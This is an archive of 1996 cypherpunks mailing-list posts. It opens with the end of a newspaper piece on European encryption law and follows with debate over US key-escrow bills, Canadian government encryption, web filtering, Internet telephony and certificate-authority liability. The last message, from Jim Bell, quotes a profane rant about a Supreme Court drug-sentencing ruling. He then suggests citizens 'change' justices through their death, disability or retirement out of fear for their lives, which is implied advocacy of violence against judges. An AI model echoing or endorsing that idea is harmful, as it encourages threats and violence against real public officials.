   Electronic Messaging Association. He is concerned at the 
   lack of a co-ordinated European policy on encryption. And 
   he fears that effective security measures could become 
   illegal with the advent of future legislation curbing the 
   availability of encryption software. 
 
   It is illegal at the moment to use strong cryptography 
   techniques in France without first depositing the key to 
   unlocking your codes with the French government. UK 
   companies developing sophisticated security programs find 
   their software classified as munitions and subject to tight 
   export restrictions, even within the EC. 
 
   In the US, the author of strong encryption program, called 
   'Pretty Good Privacy', found himself facing a Grand Jury 
   and possible charges of exporting prohibited technology. 
   The NSA has proposed that all personal computers made in 
   the US contain the Clipper Chip. This security feature 
   would give easy access to any data communications, however 
   the user chose to encode it. The proposal is currently 
   stalled, having met with ferocious opposition. 
 
   Both suppliers of information technology and industry at 
   large need to clear a path through this international maze. 
   The legal structure surrounding the use of encryption 
   technology is of particular concern to anyone working in 
   electronic commerce. 
 
   "The Clipper Chip debate raised a fundamental moral issue," 
   says Mr James. "Software technology means that strong 
   encryption, previously available only to the military, can 
   now be obtained by the public. If governments then find 
   messages hard to break, it leads immediately to a conflict 
   of interest." 
 
   One company that has confronted this apparent conflict of 
   interest between state and commerce, with its attendant 
   uncertainty, is the Anglo-Dutch oil giant, Shell. Mr Nick 
   Mansfield, a Shell technical consultant specialising in 
   information security, says the company is enthusiastic 
   about the potential for eliminating paperwork across its 
   sprawling global operations -- "we are committed to 
   electronic trading," he says. "We have a vast 
   electronic-mail network. But there is still a section of 
   our business where we have to use paper". 
 
   Contract agreements are at issue here. Until security can 
   be absolutely guaranteed, bilateral agreements must be seen 
   to be tamper-proofed. Shell is about to deploy technology 
   to secure personal computers and PC servers across the 
   world. This e-mail security system will cost around L1m in 
   software purchasing plus L100,000 a year to run. It will 
   have 4,000 users. 
 
   Far from escalating costs, Mr Mansfield explains that 
   expenses are falling as security improves. Shell used to 
   run a secure telex network that cost L4m in technology and 
   required L200,000 a year to support 120 sites. This was 
   superseded by a secure fax network costing L1m in systems, 
   plus L100,000 in annual maintenance for 200 sites. The 
   latest system will expand secure messaging beyond the fax 
   network's remit. 
 
   But setting up this security system involved Shell in a 
   long and involved process. Its chosen security software is 
   subject to close scrutiny by the UK authorities, who worked 
   with Shell to customise the program before it could be 
   released for use overseas. 
 
   While Mr Mansfield is pleased that Shell's security system 
   is so strong, it required an export licence and he echoes 
   the concerns of EEMA's Mr James -- "it's a cart and horse 
   situation. Until governments agree on policy and relax some 
   restrictions, industry won't be encouraged to development 
   extreme standards of encryption". 
 
   There needs to be a broad European debate on this issue. 
   Until this complex web of technical, legal and moral 
   questions are resolved, secure commercial data networks 
   will be operating under a cloud of uncertainty. 
 
   Michael Dempsey 
 
   [End] 
 
   Note: Shell's Nick Mansfield was a speaker at the OECD 
   cryptography conference in Paris in December. 
 
   This issue of FT includes a 22-page special section on 
   Information Technology. 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uunet!in1.uu.net!news.mathworks.com!tank.news.pipex.net!pipex!warwick!bsmail!mail!lwmdcg@warwick.com (Mark Gould)
Date: Wed, 6 Mar 96 06:51:01 PST
To: cypherpunks@toad.com
Subject: test
Message-ID: <Dnuo4K.7Fn@uns.bris.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



uyfiyufik

--
    |    Mark Gould, Department of Law, University of Bristol     |
    |  Mark.Gould@bris.ac.uk  |  http://www.bris.ac.uk/%7Elwmdcg  |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Janzen <janzen@idacom.hp.com>
Date: Thu, 7 Mar 96 11:14:24 PST
To: cypherpunks@toad.com
Subject: Good news for Canadians, I think...
Message-ID: <9603071822.AA07880@sabel.idacom.hp.com>
MIME-Version: 1.0
Content-Type: text/plain



On the mailing list for the "Electronic Frontier Canada" (similar to, but
not a part of EFF), David Jones (djones@insight.dcss.McMaster.CA) writes:
>
>      Feds want encryption; Police opposition ignored.
>
>The federal government wants its employees, and Canadians in general,
>to use strong, public-key encryption.  Yes, the same encryption methods
>that American law enforcement is so uptight about.  The same encryption
>that Canadian cops want to avoid, so they can continue to eavesdrop.
>
>It's summarized in a recent Ottawa Citizen article:
>
>        gopher://insight.mcmaster.ca/00/org/efc/media/citizen.13feb96
>
>You may recall the Canadian Association of Chiefs of Police (CACP)
>have voiced their opposition to any encryption of communications unless
>police had access to a "backdoor" last summer.
>
>        gopher://insight.mcmaster.ca/00/org/efc/law/cacp.24aug95
>
>In Canada, it looks like the right to privacy of telecommunications
>might take precedence over the police interest in snooping to catch
>criminals.


I won't repost the entire article here, but here are some highlights:

  - The system is initially intended to secure email between federal
    government employees.  Deployment is expected to begin next year.

  - Key management is decentralized; each department hands out its own keys.

  - Top-secret messages will be encoded using "palm-sized computer cards"
    (presumably some kind of PCMCIA device).

  - The Communications Security Establishment (~= NSA) helped to design
    the system, and claims that it's "more sophisticated than existing
    public versions".

    (This is the part that still worries me a bit, even though EFC's
    David Jones is quoted as saying that he has no concerns.  Will the
    algorithms be published?  Also, why develop a new, untested system --
    why not just buy the thing from RSA, Viacrypt, etc.?  Stay tuned...)

  - There's a great quote from Bob Little, deputy secretary of financial
    and information management for the Treasury Board:  "[The CSE] don't
    have access to the keys . . . and never will.  We did it to avoid
    the American experience with the Clipper Chip."

  - The RCMP (~= FBI) is not amused.


All in all, it sounds like a positive development for once.

--
Martin Janzen           janzen@idacom.hp.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: clarissa_wong@alpha.c2.org (Clarissa Wong)
Date: Thu, 7 Mar 96 11:46:49 PST
To: cypherpunks@toad.com
Subject: Re: Jump Start ecash With IPhone
Message-ID: <199603071936.LAA25351@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@homeport.org> mentioned:

> The big problem with this is that net phones can be subject to
> delay & drop out, and I don't want to deal with that when I'm talking
> on the phone.

Adam,
Yes, and that's good news.  We can claim, while we are building up our
infrastructure, that we have a low-quality service that cannot compete
with the current LD carriers.  Meanwhile, several companies and committed
enthusiasts are solving IPhone's technological problems.  Also, ATM and
other high-bandwidth technologies that the LD carriers are deploying can
bring them profits when IPhone users request the _fast_ Internet.

But the real money is in the billing system.  And an efficient,
decentralized ecash infrastructure will change the world.  A cheap
telephone-to-telephone long distance and international voice service,
which people do want to buy, could provide the cash flow to jump start it.

  CW




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 7 Mar 96 12:03:55 PST
To: "A. Padgett Peterson P.E. Information Security" <PADGETT%TCCSLR@emamv1.orl.mmc.com>
Subject: Re: Anonymous remailers and Leahy bill
Message-ID: <m0tulVI-0008zgC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 01:06 PM 3/7/96 -0500, A. Padgett Peterson P.E. Information Security wrote:
>Do not agree with you. Do support your right to disagree though.
>						 P.fla

That's all this guy said.

Here's my more verbose response.

>Do not agree with you.

You are _entitled_ to not "agree" with me.  What you are NOT entitled to, 
however, is to have a government that violates my rights by attempting to 
restrict crypto and other freedoms, even if it is with the support of 51% of 
the Congress or 51% of the voters or 51% of the population.  (or even 
substantially more.)  If you actively 
support such a government, or even encourage such a government, you are 
doing what is analogous to "inciting a riot":  You are guilty of inciting 
the government to take improper, illegal, unconstitutional, or simply 
immoral actions against me and others, and in my opinion if such actions are 
taken you enter into that conspiracy.

You may be alarmed that I might consider you a criminal for just exercising 
your "free speech."  (If you're not alarmed, you SHOULD be!)  I myself would 
greatly prefer to live in a society where speech was totally free:  There 
would be no laws against libel and slander, and you could "yell 'fire' in a 
crowded theatre" without the possibility of prosecution.  (All the other 
potential customers will be home watching on tape rental, which will make 
what you can do in a theatre less significant.)

But until we live in such a world, I consider that yelling "child porn!" or 
"terrorism!" or "drug smuggling" in "a crowded Congress" or _to_ "a crowded 
Congress" that's anxious to restrict our rights ever further, is an 
incitement to violate my rights.

> Do support your right to disagree though.

No, I don't think you do.  You've done NOTHING to actually _support_ my 
right to disagree, except possibly waste a few bytes of information space on 
a message that you did not see fit to publicize.  (I did, however.)  
Clearly, your "support" for my "right to disagree" is essentially non-existent.

Jim Bell

Klaatu Burada Nikto!




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMT866/qHVDBboB2dAQHqfAP9F1vYWiHVT67QXNXwuDWpR9n6THRL4S2W
vJq256khHXs4pMawUiGitkovVEDSBM8Tc6t6NpgNbwEojZ40dF147gqq7iTLOrf0
TU4RrUvBKiRJbTXnJM6YdHL7gOHQtU5TqHRft3R9JAHR5zEpetUSIo7+uVbklqqd
Du1cZlTbu68=
=M+dV
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 7 Mar 96 10:30:10 PST
To: cypherpunks@toad.com
Subject: VTW on crypto bills
In-Reply-To: <199603062014.PAA02169@panix4.panix.com>
Message-ID: <olDmeVq00YUuIO0EBB@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message begins here ----------

From: shabbir@vtw.org (Shabbir J. Safdar)
To: Stanton McCandlish <mech@eff.org>
cc: declan+@cmu.edu (Declan B. McCullagh), fight-censorship+@andrew.cmu.edu,
        jim@rsa.com
Subject: Re: NYT: Encryption compromise bill introduced 
Date: Wed, 06 Mar 1996 15:14:01 -0500
Sender: shabbir@panix.com


The Leahy bill is actually much better than Stanton lets on.  Take a
look at it, it affirms Americans' right to choose whatever algorithm or
technique they'd like, as well as takes great pains to go on record to
say that Congress treaded very carefully to preserve Americans' right
to not use key escrow algorithms, and if they did, not to use escrow
agents.  You don't get much more of a guarantee than that.

Regardless of the ulterior motives of the White House, key escrow
programs are still voluntary as read on the books.  The best we can
write into a law is to have our rights reaffirmed.  Leahy has given
this to us in spades.

Let's not soft-pedal this legislation.  Leahy and Goodlatte are going
head to head with the White House to undermine the strongarm export
tactics of Clipper and Son of Clipper.  They've stuck their necks out for
us, we need to back them up.

Just wait until the White House starts to act in reaction to this.  It's
not going to be pretty....

-Shabbir J. Safdar * Online Representative * Voters Telecomm. Watch (VTW)
 http://www.vtw.org/ * Defending Your Rights In Cyberspace

Stanton McCandlish writes:
>> Date: Tue, 5 Mar 96 13:26:39 PST
>> From: jim@RSA.COM (Jim Bidzos)
>> Message-Id: <9603052126.AA19534@RSA.COM>
>> Cc: cypherpunks@toad.com
>> 
>> 
>> I'm in favor of the Bill because it specifically prevents, by law, the
>> US Govt from mandating key escrow. 
>
>This is only true of the Goodlatte bill. The Leahy bill just explicitly 
>does not mandate GAK.  Goodlattes does this, and goes further, preventing 
>the Administration from doing so.
>
>Needless to say, we'd like to see the two bills merged, and the better
>features of each kept.
>
>> I anticipate that the Administration, led by the intelligence and law
>> enforcement interests, will vigorously lobby against this bill...
>
>Right. We don't expect it to pass, but it could be an important step in 
>raising the issues.
>
>
>--
><HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
></A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
></A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
></A><P>        Online Activist    </HTML>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 7 Mar 96 10:29:45 PST
To: cypherpunks@toad.com
Subject: EFF on crypto bills
In-Reply-To: <199603062155.NAA22301@eff.org>
Message-ID: <wlDmfa200YUuQO0G5d@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain



[In reply to Shabbir's message. -Declan]

---------- Forwarded message begins here ----------

From: Stanton McCandlish <mech@eff.org>
Message-Id: <199603062155.NAA22301@eff.org>
Subject: Re: NYT: Encryption compromise bill introduced
To: shabbir@vtw.org (Shabbir J. Safdar)
Date: Wed, 6 Mar 1996 13:55:07 -0800 (PST)
Cc: declan+@cmu.edu, fight-censorship+@andrew.cmu.edu, jim@rsa.com
In-Reply-To: <199603062014.PAA02169@panix4.panix.com> from "Shabbir J.
Safdar" at Mar 6, 96 03:14:01 pm

> The Leahy bill is actually much better than Stanton lets on.  Take a
> look at it, it affirms Americans' right to choose whatever algorithm or
> technique they'd like, as well as takes great pains to go on record to
> say that Congress treaded very carefully to preserve Americans' right
> to not use key escrow algorithms, and if they did, not to use escrow
> agents.  You don't get much more of a guarantee than that.

Sure you do: Goodlatte's more direct prohibition on the Exec. branch 
mandating Key Escrow.  What's the problem here?  We know Goodlatte's 
version, on this provision at very least, is better. Why can't we just 
agree that it is, and support that?  Goodlatte's bill isn't competing 
with Leahy's, they were introduced simultaneously in different chambers, 
and are intended to get the same message across. I can't see a problem 
with saying "we like this particular phrasing better, let's have it in 
both versions."  The entire point of all this is to have the same bill on 
both sides of Congress anyway.  It can either happen early, or (on the 
off chance it ever gets that far) in conference committee. Here we have a 
large say. In conf. cmte. we have almost no say.  Again, what's the problem?
What are we arguing about?
 
> Regardless of the ulterior motives of the White House, key escrow
> programs are still voluntary as read on the books.  The best we can
> write into a law is to have our rights reaffirmed.  Leahy has given
> this to us in spades.

I disagree.  A better thing we can write into law is to simultanously 
have rights reaffirmed, and send a more direct message to the Admin that it 
cannot tread here.

> Let's not soft-pedal this legislation.  

Let's not hard sell flawed parts of it, when fixes are not just 
available but already introduced as "live" legislation.

> Leahy and Goodlatte are going
> head to head with the White House to undermine the strongarm export
> tactics of Clipper and Son of Clipper.  They've stuck their necks out for
> us, we need to back them up.

Certainly.

> Just wait until the White House starts to act in reaction to this.  It's
> not going to be pretty....

No kidding.

I expect either an attempt to mandate escrow, a worsening of the export 
controls, and/or an all-out assault on American's rights to encrypt at 
all, or without some kind of worse-than-GAK registry or licensing.  If 
not all of the above.


--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>        Online Activist    </HTML>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Aldrich <maldrich@grctechs.va.grci.com>
Date: Thu, 7 Mar 96 10:38:29 PST
To: cypherpunks@toad.com
Subject: Re: forwarded message from Kendall Collett
In-Reply-To: <199603071552.HAA23865@netcom20.netcom.com>
Message-ID: <Pine.SCO.3.91.960307133313.18948C-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Mar 1996, cjs wrote:

> > 
> > BTW, did you hear that IO got on the SurfWatch "bad list" because there
> > were more than 25 complaints about objectionable material in the io.com
> > domain.  (Apparently, when SurfWatch hears more than 25 complaints
> > against a particular domain, the just deny access to the whole domain
> > rather than particular URLs.)
> 
> So.. whats the number to call? Microsoft has material on their site I
> object too. =)

And let's not forget the really objectionable stuff at 
http://www.buchanan.org/pjbindex.html (the Buchanan Campaign web site).

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Thu, 7 Mar 96 12:41:09 PST
To: cypherpunks@toad.com
Subject: re: io.com & SurfWatch
Message-ID: <199603072041.OAA17349@kenya.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain



Well, it turns out  that (according to a nice  person at SurfWatch who
put up with the rant    I mailed in   and send  back a denial   rather
quickly) io.com isn't  actually blocked.  At least, so  they say.   No
comment on whether there's anything like the "25 complaints" policy.

I don't own SurfWatch, but if anybody does and finds www.io.com
blocked, I'll send in another rant.

I wonder whether they've actually considered the liability situation
in re: blocking sites that shouldn't be blocked?    I mean, sure, they
seem nice enough about setting things right (like with the Nynex sites
whose url's had "xxx" in the paths), but it seems to this non-lawyer
that a case could be made for damages inflicted by being known as a
purveyor of filthy indecency for even a short while.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sawyer@nextek.com (Thomas J. Sawyer)
Date: Thu, 7 Mar 96 12:14:52 PST
To: cypherpunks@toad.com
Subject: Re: FCC and Internet telephones
Message-ID: <v02130500ad64a85d631d@[206.230.158.150]>
MIME-Version: 1.0
Content-Type: text/plain




>  In a statement from Washington, the America's Carriers Telecommunication
>Association says it "submits that it is incumbent upon the FCC to exercise
>jurisdiction over the use of the Internet for unregulated interstate and
>international telecommunications services."
>  "For example," adds the ACTA statement, "online service providers generally
>charge users around $10 for five hours of access and then around $3 for each
>additional hour. Five hours equals 300 minutes, divided by $10 is 3.3
>cents per
>minute. The average residential long distance telephone call costs about 22
>cents per minute or seven times as much."

It seems that once again, big business is trying to get in the way of
progress and competition because they are afriad they are going to lose
some money.  It seems to me that the ACTA is upset because someone found a
way to "do it cheaper" and the telco's stand to lose a lot of long distance
dollars.  So rather then using this technology and perhaps lowering LD
rates, instead they seek to block out the technology from the public.  I
wonder what would happen if someone discovered an drastically cheaper
alternative to gasoline, but it never made it main stream because the oil
companies would go out of business.  Seems like the same type of situation
with the telco's.

>  Says ACTA, "Technology may once again be surpassing government's ability to
>control its proper use. However, the misuse of the Internet as a way to
>'by-pass' the traditional means of obtaining long distance service could
>result in a significant reduction of the Internet's ability to transport
>its ever
>enlarging amount of data traffic."

No, the technology is surpassing the telco's ability to provide low-cost
communications.

>  Specifically, ACTA petitions the FCC to define the type of permissible
>communications that may be effected over the Internet.

Permissible communications?  This sounds like something out of the CDA ...
I say, just try and regulate it. I want to see the FCC try and monitor
several million computer transmissions every day and see how well
regulation works.


Thomas J. Sawyer
sawyer@nextek.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Thu, 7 Mar 96 12:22:27 PST
To: Duncan Frissell <frissell@panix.com>
Subject: Re: new netscape servers
In-Reply-To: <2.2.32.19960307143422.0073f934@panix.com>
Message-ID: <Pine.SUN.3.91.960307150850.25198M-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Mar 1996, Duncan Frissell wrote:

> However, a CA operating outside the licensing structure of current CA's
> would have very low costs and hence no investment to lose in litigation.
> Costs would be almost entirely marketing related and as long as you stayed
> out of jurisdictions with some of the new CA law, no regulatory costs or
> barriers.
> 

I don't think this is definitional.  If nothing else they can take the 
equipment.  If you don't incorporate, your personal assets are at risk; 
if you do, you have to keep a real separation between the corporation and 
yourself, pay the taxes, etc.  Ok, make it a non-profit labor of love; 
low risks, no returns, then maybe you are right.  Just hope that there ar 
no punitive or large consequential damages, and no one pierces the 
corporate veil (unlikely, I admit, but not impossible).

What law applies to a certificate used in a multi-jurisdictional
transaction is less obvious to me than I would like.  I think I have
talked a student in my seminar into writing a paper to educate me. 

[The above may have been dictated with Dragon Dictate/Win 2.0 voice 
recognition. Be alert for unintentional strange word substitutions.]

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mutant@compuville.com
Date: Thu, 7 Mar 96 12:51:22 PST
To: cypherpunks@toad.com
Subject: surfwatch filtering
Message-ID: <199603072056.PAA05237@lemieux.compuville.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

someone wrote:

>[homepage on IO]
>
>BTW, did you hear that IO got on the SurfWatch "bad list" because there
>were more than 25 complaints about objectionable material in the io.com
>domain.  (Apparently, when SurfWatch hears more than 25 complaints
>against a particular domain, the just deny access to the whole domain
>rather than particular URLs.)

A quick phone call to the Surf Watch people revealed that they rarely 
block whole domains, and that they are not currently blocking all of 
io.com. 

- -- 

mutant@compuville.com		"They that can give up essential liberty to
mutant@cypher.net		 obtain a little temporary safety deserve
(send mail with Subject:	 neither liberty nor safety."
 send-pgp-key for PGP key) 	  	        -Ben Franklin  ~1784

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMT9NaH0ndmRPxibdAQFSJwQAtq/s1c+GZlHvgVOhNgM8Dseq0SQ+6L8U
bx8FV0l85anNk+fjRnY5hD8RflHFeVzLis2yDmn8BLjYzVnHBEWBXXncpwg3okoQ
FOMJJTZZbOec10ESy3pvRPwgie60IaR3qIcHUmUHRqbv5dOjgDg5GhYWeZ8rhCCN
0pisfaQBsVc=
=qgSw
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 14 Mar 96 20:23:57 PST
To: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Subject: Re: Why escrow? (was Re: How would Leahy bill affect crypto
Message-ID: <m0txQMp-0008xEC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:25 PM 3/14/96 +0000, Deranged Mutant wrote:
>On 14 Mar 96 at 12:00, jim bell wrote:
>
>> At 07:57 AM 3/14/96 +0000, Deranged Mutant wrote:
>> >Would it be legal to deceive an escrow agent?
>> 
>> It _should_ be legal.  At least, assuming the arrangement is truly voluntary 
>> and the escrow agent gets his part of the bargain (his usual fee) he has no 
>> interest in knowing whether or not the data he's holding for you is "real" 
>> or "imaginary."  
>
>I mean illegal in the sense that your true purpose is to decieve law 
>enforcement. (Yes, it'll also fake out anyone who bribes the escrow 
>agent for your keys, though....)

As long as they claim that escrowing keys is "voluntary" in the first place, 
then I find it hard to imagine that they would have a legal claim against 
you if the key you "escrowed" was phony.  OTOH, if one potentially-valid 
interpretation of the law is that failing to give the keys when you're asked 
is a crime, presumably even if you never had them in the first place, then 
all bets are off.  IMO, a properly-designed crypto telephone keeps nothing 
with it that would later be useable to decrypt the conversations it has 
transmitted or received; one danger in this bill is that its very existence 
might make the manufacture of crypto phones with this characteristic 
illegal, on the theory that because they keep no keys, the user is going to 
be in violation of this law automatically.  It's a stretch, but a stretch 
the government is always anxious to make.

And if you recall the requirements the government wanted to put on 
telephones equipped with Clipper, one thing they eventually admitted was 
that they were insisting that such phones be designed to be inoperable with 
a telephone that had its "key-escrow" not "enabled".  And they still wanted to 
call it "voluntary!  That's a laugh!


>Of course that depends how you give your key to an escrow agent. If 
>it's already escrowed when you buy a phone, for instance...

That's the real danger with any such legislation.  Individuals can generally 
only get things that are manufactured for sale.  (You can't buy a car with a 
7-cylinder engine, for instance...)  If manufacturers are dissuaded from 
building a good crypto telephone, then key-escrow can be as "voluntary" as 
you want and you still won't be able to exercise your rights. 

Jim Bell
jimbell@pacifier.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 14 Mar 96 21:16:32 PST
To: WlkngOwl@unix.asb.com
Subject: Re: Why escrow? (was Re: How would Leahy bill affect crypto
Message-ID: <m0txR9h-0008yuC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:30 PM 3/14/96 -0500, Yawn82@aol.com wrote:
>How the hell do I get off this list?

You can check out any time you want, but you can never leave.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 14 Mar 96 21:21:05 PST
To: Black Unicorn <cypherpunks@toad.com>
Subject: Re: RICO and remailers (brief treatment, if long)
Message-ID: <m0txRGg-00091GC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:30 PM 3/13/96 -0500, Black Unicorn wrote:
>0
>Several people expressed interest in a small treatment of seizure law 
>jurisprudence, and the Bennis case (seizure of an automobile used for 
>soliciting prostitution was upheld even where one of the owners knew 
>nothing about its use for a crime and which Mr. Bell has relied on 
>fairly heavily in pointing out that the Supreme Court has its "head 
>up its ass.")

"Relied on"?  Hell no!  Not when I get the following text, from an anonymous 
source.  

Begin quotation:


So he wants a cite of Supreme Court decisions from you bearing on  
legislative history & congressional intent, does he?

I've attatched the relevant syllabus <summary> which is from the  
Supreme Court reporter & carries no legal weight, along with the  
UNANIMOUS decision in Neal written by Kennedy. It's an acid case, the  
Supreme court having ruled a long time ago in Chapmann that the ENTIRE  
weight of of LSD AND blotter paper, which usually contains 100mcg or  
0.1mg of actual LSD-25 per dose, vs. the enormous weight of the paper.  
This entire weight of basically all paper has been used to give 21 year  
old 1st offenders 10 YEARS, which under current Federal Rules works out  
to about 8.5 years FLAT time in the joint.  The original  
absurdity was challenged in Chapman but the SC blindly stuck to it's  
own reading of "mixture or substance", blindly ignoring reality &  
Congressional intent that "cuts" of drugs such as heroin or cocaine  
being an attempt to increase the amount sold & therefore profit, should  
be punished, while the LSD paper was merely a way to transport &  
distribute it. As far as congressional intent goes, Joseph Biden has  
said that as chairman of the senate judiciary committee, they gave  
little thought to LSD but they definitely did NOT mean weigh the whole  
blotter paper in handing out nickels & dimes. Now the US Sentencing  
Commission has changed the guidelines by changing the way the dosage is  
calculated to something reasonable, the SC refuses to make the change  
retroactive to help a lot of people. Note where Kennedy basically says  
that if Congress passees laws that are poorly worded & subject to  
create great unfairness in sentences, the SC, once they've made a  
stupid decision in interpretation will stick to it no matter how unfair  
it is in order to make congress write laws that are linguistically  
intelligible. This would be fine if those on the sharp end of them were  
congressmen. The more Supreme Cocksucker decisions I read like this,  
the better BOTH your big ideas sound.

This & all recent other decisions of the 9 in-Justices are available at  
the below address. 



http://spoke.law.cornell.edu:8001/supct/opinionlist.1995.html

Syllabus:
  
NOTE: Where it is feasible, a syllabus (headnote) will be released, as is
being done in connection with this case, at the time the opinion is issued. 
The syllabus constitutes no part of the opinion of the Court but has been
prepared by the Reporter of Decisions for the convenience of the reader. 
See United States v. Detroit Lumber Co., 200 U. S. 321, 337.

SUPREME COURT OF THE UNITED STATES

Syllabus

NEAL v. UNITED STATES
certiorari to the united states court of appeals for the seventh circuit
No. 94-9088.   Argued December 4, 1995-Decided January 22, 1996

When the District Court first sentenced petitioner Neal on two plea-
 bargained convictions involving possession of LSD with intent to
 distribute, the amount of LSD sold by a drug trafficker was deter-
 mined, under both the federal statute directing minimum sentences
 and the United States Sentencing Commission's Guidelines Manual,
 by the whole weight of the blotter paper or other carrier medium
 containing the drug.  Because the combined weight of the blotter
 paper and LSD actually sold by Neal was 109.51 grams, the court
 ruled, among other things, that he was subject to 21 U. S. C.
 841(b)(1)(A)(v), which imposes a 10-year mandatory minimum sen-
 tence on anyone convicted of trafficking in more than 10 grams of
 ``a mixture or substance containing a detectable amount'' of LSD. 
 After the Commission revised the Guidelines' calculation method by
 instructing courts to give each dose of LSD on a carrier medium a
 constructive or presumed weight, Neal filed a motion to modify his
 sentence, contending that the weight of the LSD attributable to him
 under the amended Guidelines was only 4.58 grams, well short of
 841(b)(1)(A)(v)'s 10-gram requirement, and that the Guidelines'
 presumptive-weight method controlled the mandatory minimum
 calculation.  The District Court followed Chapman v. United States,
 500 U. S. 453, 468, in holding, inter alia, that the actual weight of
 the blotter paper, with its absorbed LSD, was determinative of
 whether Neal crossed the 10-gram threshold and that the 10-year
 mandatory minimum sentence still applied to him notwithstanding
 the Guidelines.  In affirming, the en banc Seventh Circuit agreed
 with the District Court that a dual system now prevails in calculat-
 ing LSD weights in cases like this.
Held:  Section 841(b)(1) directs a sentencing court to take into account
 the actual weight of the blotter paper with its absorbed LSD, even
 though the Sentencing Guidelines require a different method of
 calculating the weight of an LSD mixture or substance.  The Court
 rejects petitioner's contentions that the revised Guidelines are
 entitled to deference as a construction of 841(b)(1) and that those
 Guidelines require reconsideration of the method used to determine
 statutory minimum sentences.  While the Commission's expertise
 and the Guidelines' design may be of potential weight and relevance
 in other contexts, the Commission's choice of an alternative method-
 ology for weighing LSD does not alter Chapman's interpretation of
 the statute.  In any event, stare decisis requires that the Court
 adhere to Chapman in the absence of intervening statutory changes
 casting doubt on the case's interpretation.  It is doubtful that the
 Commission intended the Guidelines to displace Chapman's actual-
 weight method for statutory minimum sentences, since the Commis-
 sion's authoritative Guidelines commentary indicates that the new
 method is not an interpretation of the statute, but an independent
 calculation, and suggests that the statute controls if it conflicts with
 the Guidelines.  Moreover, the Commission's dose-based method
 cannot be squared with Chapman.  In these circumstances, this
 Court need not decide what, if any, deference is owed the Commis-
 sion in order to reject its contrary interpretation.  Once the Court
 has determined a statute's meaning, it adheres to its ruling under
 stare decisis and assesses an agency's later interpretation of the
 statute against that settled law.  It is the responsibility of Congress,
 not this Court, to change statutes that are thought to be unwise or
 unfair.  Pp. 4-12. 46 F. 3d 1405, affirmed.
 Kennedy, J., delivered the opinion for a unanimous Court.


end of anonymous quotation.  JB.

My commentary continues below: JB.

Note the sentence above,

"It is the responsibility of Congress, not this Court, to change statutes 
that are thought to be unwise or unfair."  

As far as I am aware, there is no _legal_ mechanism, short of impeachment 
(but how practical is that?), to remove a sitting SC justice, no matter how 
damaging his effect on the country by his decisions.  Thus, I propose 
re-writing the above sentence a bit:


"It is the responsibility of the citizenry, not Congress, to 'change' 
Supreme Court Justices that are thought to be unwise or unfair."

Since that change can be accomplished if that 'Justice' dies or becomes 
disabled, (or retires, perhaps because he's in fear for his life) I think 
